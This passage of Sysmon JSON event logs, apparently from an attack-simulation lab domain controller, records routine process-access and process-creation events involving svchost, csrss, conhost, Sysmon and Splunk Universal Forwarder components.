07:57:41.341","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4144,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.341","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4145,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.341\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-001093590500}\r\nSourceProcessId: 4448\r\nSourceThreadId: 4424\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {41C8662E-2075-5F25-0000-00107E2B0600}\r\nTargetProcessId: 2440\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.341","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-001093590500}","SourceProcessId":"4448","SourceThreadId":"4424","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{41C8662E-2075-5F25-0000-00107E2B0600}","TargetProcessId":"2440","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:41","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4146,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:41.466\r\nSourceProcessGUID: {41C8662E-2075-5F25-0000-00107E2B0600}\r\nSourceProcessId: 2440\r\nSourceThreadId: 668\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe\r\nTargetProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nTargetProcessId: 4576\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nGrantedAccess: 0x101400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:41.466","SourceProcessGUID":"{41C8662E-2075-5F25-0000-00107E2B0600}","SourceProcessId":"2440","SourceThreadId":"668","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe","TargetProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","TargetProcessId":"4576","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","GrantedAccess":"0x101400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6025c5|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+6020f6|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+59e67|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+5b88c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-admon.exe+8e7d70|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:41","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4147,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.014\r\nProcessGuid: {41C8662E-2076-5F25-0000-0010512D0600}\r\nProcessId: 3264\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nFileVersion: 8.0.2\r\nDescription: Network monitor\r\nProduct: Splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunk-netmon.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {41C8662E-1F61-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC\r\nParentProcessGuid: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nParentProcessId: 4576\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.014","ProcessGuid":"{41C8662E-2076-5F25-0000-0010512D0600}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","FileVersion":"8.0.2","Description":"Network monitor","Product":"Splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunk-netmon.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\"","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{41C8662E-1F61-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC","ParentProcessGuid":"{41C8662E-1FF3-5F25-0000-00109F540500}","ParentProcessId":"4576","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\" service","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4148,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1FF3-5F25-0000-00109F540500}\r\nSourceProcessId: 4576\r\nSourceThreadId: 2580\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nTargetProcessGUID: {41C8662E-2076-5F25-0000-0010512D0600}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1FF3-5F25-0000-00109F540500}","SourceProcessId":"4576","SourceThreadId":"2580","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","TargetProcessGUID":"{41C8662E-2076-5F25-0000-0010512D0600}","TargetProcessId":"3264","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+ce6a3b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17cade|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18641d|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+17ef16|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c992c4|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+18689b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+189d3c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c95f5f|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c99fad|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+184c5b|C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe+c7dd7e|C:\\Windows\\System32\\ucrtbase.dll+1fb80|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4149,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-2076-5F25-0000-0010512D0600}\r\nTargetProcessId: 3264\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-2076-5F25-0000-0010512D0600}","TargetProcessId":"3264","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4150,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4151,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:57:42.013","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:57:43","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:57:42","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4152,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:57:42.013\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 